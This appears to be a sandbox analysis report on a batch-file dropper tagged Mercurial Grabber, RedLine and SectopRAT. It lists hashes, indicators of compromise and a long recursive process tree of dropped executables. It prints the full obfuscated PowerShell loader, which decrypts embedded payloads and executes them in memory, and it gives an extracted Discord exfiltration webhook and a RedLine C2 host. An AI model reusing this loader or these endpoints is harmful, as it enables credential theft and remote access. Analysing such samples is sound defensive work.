mercurialgrabber | c08bf46d6faaf447bf8b8a5a6c475873d1c2c47723fdc19ebf3f657fb8413e3f

Analysis

max time kernel
293s
max time network
307s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29-04-2024 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

23.4MB
MD5

058512c3d0827870573edbda5ac7e397
SHA1

17e74897a99a396ace8de33a9a2c844fe0d85a55
SHA256

c08bf46d6faaf447bf8b8a5a6c475873d1c2c47723fdc19ebf3f657fb8413e3f
SHA512

076c6e1966254d2f8edc726e8bd61774c8742c36731616dfbfb5b13b868af66a7b5e04d0958e051a13e0f3bb9f62b63a88df7162ab2a5dba34b5a0fd8c15f233
SSDEEP

49152:r1A4BWF3lwVZsfLZvDY72/3i5iz8WvWWMjNHGeTCK1Bs0+hG4mAK5Pp86mSFzbkz:r4

Score

10^/10

mercurialgrabber redline sectoprat fake slinky infostealer rat stealer trojan

Malware Config

Extracted

Family

mercurialgrabber

https://discord.com/api/webhooks/1234301738757001307/J48FrxcIY2MznyD-QrXgOrGXbnFfNRD0MMNNy87Y34EWKexlEGM_on4JdcwW4I6PtUzz

Extracted

Family

redline

Botnet

Fake Slinky

ii-restored.gl.at.ply.gg:43416

Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000900000001abbb-51.dat	family_redline
behavioral1/memory/4412-53-0x0000000000A10000-0x0000000000A2E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000900000001abbb-51.dat	family_sectoprat
behavioral1/memory/4412-53-0x0000000000A10000-0x0000000000A2E000-memory.dmp	family_sectoprat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	4184	powershell.exe
5	4184	powershell.exe
7	4184	powershell.exe
10	4184	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3080	slinkyloader.exe
4412	build.exe
2536	slinkyloader.exe
4236	build.exe
1856	slinkyloader.exe
4916	build.exe
2404	slinkyloader.exe
4440	build.exe
4788	slinkyloader.exe
388	build.exe
2880	slinkyloader.exe
2416	build.exe
4040	slinkyloader.exe
3136	build.exe
5096	slinkyloader.exe
4288	build.exe
5024	slinkyloader.exe
4156	build.exe
3368	slinkyloader.exe
168	build.exe
240	slinkyloader.exe
4472	build.exe
688	slinkyloader.exe
4984	build.exe
828	slinkyloader.exe
4460	build.exe
3084	slinkyloader.exe
2320	build.exe
384	slinkyloader.exe
632	build.exe
4260	slinkyloader.exe
2284	build.exe
3524	slinkyloader.exe
3560	build.exe
4516	slinkyloader.exe
4844	build.exe
3164	slinkyloader.exe
688	build.exe
2364	slinkyloader.exe
3544	build.exe
5164	slinkyloader.exe
5248	build.exe
5308	slinkyloader.exe
5392	build.exe
5452	slinkyloader.exe
5536	build.exe
5596	slinkyloader.exe
5680	build.exe
5740	slinkyloader.exe
5824	build.exe
5884	slinkyloader.exe
5968	build.exe
6028	slinkyloader.exe
6112	build.exe
4776	slinkyloader.exe
2292	build.exe
5328	slinkyloader.exe
5472	build.exe
5700	slinkyloader.exe
5840	build.exe
5740	slinkyloader.exe
5900	build.exe
6056	slinkyloader.exe
5240	build.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	discord.com
7	discord.com
10	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip4.seeip.org
3	ip4.seeip.org
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
408	wermgr.exe
408	wermgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4412	build.exe
Token: SeDebugPrivilege	4236	build.exe
Token: SeDebugPrivilege	4916	build.exe
Token: SeDebugPrivilege	4440	build.exe
Token: SeDebugPrivilege	388	build.exe
Token: SeDebugPrivilege	2416	build.exe
Token: SeDebugPrivilege	3136	build.exe
Token: SeDebugPrivilege	4288	build.exe
Token: SeDebugPrivilege	4156	build.exe
Token: SeDebugPrivilege	168	build.exe
Token: SeDebugPrivilege	4472	build.exe
Token: SeDebugPrivilege	4984	build.exe
Token: SeDebugPrivilege	4460	build.exe
Token: SeDebugPrivilege	2320	build.exe
Token: SeDebugPrivilege	632	build.exe
Token: SeDebugPrivilege	2284	build.exe
Token: SeDebugPrivilege	3560	build.exe
Token: SeDebugPrivilege	4844	build.exe
Token: SeDebugPrivilege	688	build.exe
Token: SeDebugPrivilege	3544	build.exe
Token: SeDebugPrivilege	5248	build.exe
Token: SeDebugPrivilege	5392	build.exe
Token: SeDebugPrivilege	5536	build.exe
Token: SeDebugPrivilege	5680	build.exe
Token: SeDebugPrivilege	5824	build.exe
Token: SeDebugPrivilege	5968	build.exe
Token: SeDebugPrivilege	6112	build.exe
Token: SeDebugPrivilege	2292	build.exe
Token: SeDebugPrivilege	5472	build.exe
Token: SeDebugPrivilege	5840	build.exe
Token: SeDebugPrivilege	5900	build.exe
Token: SeDebugPrivilege	5240	build.exe
Token: SeDebugPrivilege	2488	build.exe
Token: SeDebugPrivilege	5388	build.exe
Token: SeDebugPrivilege	3916	build.exe
Token: SeDebugPrivilege	5888	build.exe
Token: SeDebugPrivilege	5316	build.exe
Token: SeDebugPrivilege	5524	build.exe
Token: SeDebugPrivilege	5028	build.exe
Token: SeDebugPrivilege	4436	build.exe
Token: SeDebugPrivilege	3112	build.exe
Token: SeDebugPrivilege	3804	build.exe
Token: SeDebugPrivilege	6156	build.exe
Token: SeDebugPrivilege	6296	build.exe
Token: SeDebugPrivilege	6432	build.exe
Token: SeDebugPrivilege	6568	build.exe
Token: SeDebugPrivilege	6704	build.exe
Token: SeDebugPrivilege	6840	build.exe
Token: SeDebugPrivilege	6980	build.exe
Token: SeDebugPrivilege	7116	build.exe
Token: SeDebugPrivilege	3912	build.exe
Token: SeDebugPrivilege	6416	build.exe
Token: SeDebugPrivilege	6644	build.exe
Token: SeDebugPrivilege	6960	build.exe
Token: SeDebugPrivilege	4568	build.exe
Token: SeDebugPrivilege	6368	build.exe
Token: SeDebugPrivilege	6764	build.exe
Token: SeDebugPrivilege	6228	build.exe
Token: SeDebugPrivilege	4088	build.exe
Token: SeDebugPrivilege	1612	build.exe
Token: SeDebugPrivilege	7284	build.exe
Token: SeDebugPrivilege	7420	build.exe
Token: SeDebugPrivilege	7556	build.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5104 wrote to memory of 4184	5104	cmd.exe	75
PID 5104 wrote to memory of 4184	5104	cmd.exe	75
PID 4184 wrote to memory of 3080	4184	powershell.exe	76
PID 4184 wrote to memory of 3080	4184	powershell.exe	76
PID 3080 wrote to memory of 4412	3080	slinkyloader.exe	78
PID 3080 wrote to memory of 4412	3080	slinkyloader.exe	78
PID 3080 wrote to memory of 4412	3080	slinkyloader.exe	78
PID 3080 wrote to memory of 2536	3080	slinkyloader.exe	108
PID 3080 wrote to memory of 2536	3080	slinkyloader.exe	108
PID 4184 wrote to memory of 408	4184	powershell.exe	81
PID 4184 wrote to memory of 408	4184	powershell.exe	81
PID 2536 wrote to memory of 4236	2536	slinkyloader.exe	83
PID 2536 wrote to memory of 4236	2536	slinkyloader.exe	83
PID 2536 wrote to memory of 4236	2536	slinkyloader.exe	83
PID 2536 wrote to memory of 1856	2536	slinkyloader.exe	85
PID 2536 wrote to memory of 1856	2536	slinkyloader.exe	85
PID 1856 wrote to memory of 4916	1856	slinkyloader.exe	86
PID 1856 wrote to memory of 4916	1856	slinkyloader.exe	86
PID 1856 wrote to memory of 4916	1856	slinkyloader.exe	86
PID 1856 wrote to memory of 2404	1856	slinkyloader.exe	88
PID 1856 wrote to memory of 2404	1856	slinkyloader.exe	88
PID 2404 wrote to memory of 4440	2404	slinkyloader.exe	89
PID 2404 wrote to memory of 4440	2404	slinkyloader.exe	89
PID 2404 wrote to memory of 4440	2404	slinkyloader.exe	89
PID 2404 wrote to memory of 4788	2404	slinkyloader.exe	91
PID 2404 wrote to memory of 4788	2404	slinkyloader.exe	91
PID 4788 wrote to memory of 388	4788	slinkyloader.exe	92
PID 4788 wrote to memory of 388	4788	slinkyloader.exe	92
PID 4788 wrote to memory of 388	4788	slinkyloader.exe	92
PID 4788 wrote to memory of 2880	4788	slinkyloader.exe	94
PID 4788 wrote to memory of 2880	4788	slinkyloader.exe	94
PID 2880 wrote to memory of 2416	2880	slinkyloader.exe	95
PID 2880 wrote to memory of 2416	2880	slinkyloader.exe	95
PID 2880 wrote to memory of 2416	2880	slinkyloader.exe	95
PID 2880 wrote to memory of 4040	2880	slinkyloader.exe	97
PID 2880 wrote to memory of 4040	2880	slinkyloader.exe	97
PID 4040 wrote to memory of 3136	4040	slinkyloader.exe	98
PID 4040 wrote to memory of 3136	4040	slinkyloader.exe	98
PID 4040 wrote to memory of 3136	4040	slinkyloader.exe	98
PID 4040 wrote to memory of 5096	4040	slinkyloader.exe	100
PID 4040 wrote to memory of 5096	4040	slinkyloader.exe	100
PID 5096 wrote to memory of 4288	5096	slinkyloader.exe	101
PID 5096 wrote to memory of 4288	5096	slinkyloader.exe	101
PID 5096 wrote to memory of 4288	5096	slinkyloader.exe	101
PID 5096 wrote to memory of 5024	5096	slinkyloader.exe	103
PID 5096 wrote to memory of 5024	5096	slinkyloader.exe	103
PID 5024 wrote to memory of 4156	5024	slinkyloader.exe	104
PID 5024 wrote to memory of 4156	5024	slinkyloader.exe	104
PID 5024 wrote to memory of 4156	5024	slinkyloader.exe	104
PID 5024 wrote to memory of 3368	5024	slinkyloader.exe	106
PID 5024 wrote to memory of 3368	5024	slinkyloader.exe	106
PID 3368 wrote to memory of 168	3368	slinkyloader.exe	107
PID 3368 wrote to memory of 168	3368	slinkyloader.exe	107
PID 3368 wrote to memory of 168	3368	slinkyloader.exe	107
PID 3368 wrote to memory of 240	3368	slinkyloader.exe	109
PID 3368 wrote to memory of 240	3368	slinkyloader.exe	109
PID 240 wrote to memory of 4472	240	slinkyloader.exe	110
PID 240 wrote to memory of 4472	240	slinkyloader.exe	110
PID 240 wrote to memory of 4472	240	slinkyloader.exe	110
PID 240 wrote to memory of 688	240	slinkyloader.exe	134
PID 240 wrote to memory of 688	240	slinkyloader.exe	134
PID 688 wrote to memory of 4984	688	slinkyloader.exe	113
PID 688 wrote to memory of 4984	688	slinkyloader.exe	113
PID 688 wrote to memory of 4984	688	slinkyloader.exe	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HfNNYlgEmRA+ryhJ6y3KeWwmRsA3EpQSXrZHnK4Ec3g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B7FoHzWUOgX2ubyvo9N4sw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SaFMf=New-Object System.IO.MemoryStream(,$param_var); $RGSkW=New-Object System.IO.MemoryStream; $GBVmt=New-Object System.IO.Compression.GZipStream($SaFMf, [IO.Compression.CompressionMode]::Decompress); $GBVmt.CopyTo($RGSkW); $GBVmt.Dispose(); $SaFMf.Dispose(); $RGSkW.Dispose(); $RGSkW.ToArray();}function execute_function($param_var,$param2_var){ $zvFjl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RRizq=$zvFjl.EntryPoint; $RRizq.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\test.bat';$CEdvn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($wwHnM in $CEdvn) { if ($wwHnM.StartsWith(':: ')) { $QpkiF=$wwHnM.Substring(3); break; }}$payloads_var=[string[]]$QpkiF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
    "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
      "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
    - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1856
      - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
      - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:168
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:240
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:688
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        Executes dropped EXE
        
        PID:828
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        Executes dropped EXE
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        Executes dropped EXE
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        Executes dropped EXE
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        Executes dropped EXE
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        20⤵
        Executes dropped EXE
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        21⤵
        Executes dropped EXE
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:688
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        Executes dropped EXE
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        Executes dropped EXE
        
        PID:5308
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        Executes dropped EXE
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        Executes dropped EXE
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        Executes dropped EXE
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        Executes dropped EXE
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        Executes dropped EXE
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        Executes dropped EXE
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        Executes dropped EXE
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        Executes dropped EXE
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        Executes dropped EXE
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:4040
        
